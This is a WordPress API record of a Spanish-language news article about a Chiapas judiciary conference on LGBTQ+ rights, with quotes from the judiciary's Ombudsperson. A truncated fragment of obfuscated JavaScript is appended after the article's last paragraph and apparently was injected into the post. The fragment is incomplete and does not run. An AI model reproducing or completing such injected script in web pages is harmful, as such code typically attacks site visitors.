{"id":17688,"date":"2024-09-06T02:47:49","date_gmt":"2024-09-06T02:47:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17688"},"modified":"2024-09-06T02:47:51","modified_gmt":"2024-09-06T02:47:51","slug":"realiza-poder-judicial-conferencia-sobre-derechos-de-las-personas-lgbtq","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17688","title":{"rendered":"Realiza Poder Judicial conferencia sobre Derechos de las Personas LGBTQ+"},"content":{"rendered":"\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17689\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.38-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-17689\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.38-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.38-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.38-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.38-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.38-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17690\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-17690\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-1-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-1-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-1-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-1-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-1.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17691\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-2-1024x576.jpeg\" alt=\"\" class=\"wp-image-17691\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-2-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-2-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-2-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-2-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-05-at-2.28.39-PM-2.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>5 de septiembre del 2024. Tuxtla Guti\u00e9rrez, Chiapas.- El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, en aras de la continua actualizaci\u00f3n, profesionalizaci\u00f3n y sensibilizaci\u00f3n en temas sobre Derechos Humanos, llev\u00f3 a cabo la conferencia<br>Derechos de las Personas LGBTQ+.<\/p>\n\n\n\n<p>En modalidad presencial, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, alrededor de 80 participantes, magistradas, magistrados, juezas, jueces, directoras y directores, as\u00ed como personal jurisdiccional y administrativo, se dieron<br>cita en la Sala de Presidentes para escuchar al especialista en Derechos Humanos, Sergio Luis Morales Hern\u00e1ndez.<\/p>\n\n\n\n<p>Encabezando esta actividad, la consejera de la Judicatura y Ombudsperson, Zelmira Perla de Roc\u00edo Guti\u00e9rrez Beltr\u00e1n, fue la encargada de expresar el mensaje de bienvenida, y record\u00f3 que en el Poder Judicial se reconoce y se garantiza a las personas servidoras<br>p\u00fablicas el respeto a los derechos humanos, a la igualdad sustantiva y a la no discriminaci\u00f3n.<\/p>\n\n\n\n<p>\u201cCon actividades como esta conferencia, seguimos fomentando la cultura de la protecci\u00f3n y garant\u00eda de los Derechos Humanos, que observamos en el Poder Judicial, pero en esta ocasi\u00f3n con \u00e9nfasis en los derechos de las personas de la comunidad LGBTQ+, esto en<br>conformidad con la Norma Mexicana 025 de Igualdad Laboral y No discriminaci\u00f3n, con la cual orgullosamente este Poder Judicial est\u00e1 certificado\u201d, manifest\u00f3 Guti\u00e9rrez Beltr\u00e1n.<\/p>\n\n\n\n<p>Finalmente, la Ombudsperson, exhort\u00f3 a las y los asistentes a que las herramientas adquiridas ayuden en la adopci\u00f3n de buenas pr\u00e1cticas en su quehacer diario, en beneficio de las personas justiciables.<\/p>\n\n\n\n<p>Cabe recordar que, el Poder Judicial del Estado de Chiapas obtuvo en el 2022, la Certificaci\u00f3n de la Norma Mexicana NMX-R-025-SCFI-2015 en Igualdad Laboral y No Discriminaci\u00f3n, nivel Plata, que otorga el Instituto Nacional de las Mujeres (Inmujeres), la Secretar\u00eda<br>del Trabajo y Previsi\u00f3n Social (STPS) y el Consejo Nacional para Prevenir la Discriminaci\u00f3n (Conapred).<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 5 de septiembre del 2024. Tuxtla Guti\u00e9rrez, Chiapas.- El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, en aras de la continua actualizaci\u00f3n, profesionalizaci\u00f3n y sensibilizaci\u00f3n en temas sobre Derechos Humanos, llev\u00f3 a cabo la conferenciaDerechos de las Personas LGBTQ+. En modalidad presencial, a trav\u00e9s del Instituto de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17689,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17688","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17688"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17688\/revisions"}],"predecessor-version":[{"id":17692,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17688\/revisions\/17692"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17689"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17688"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}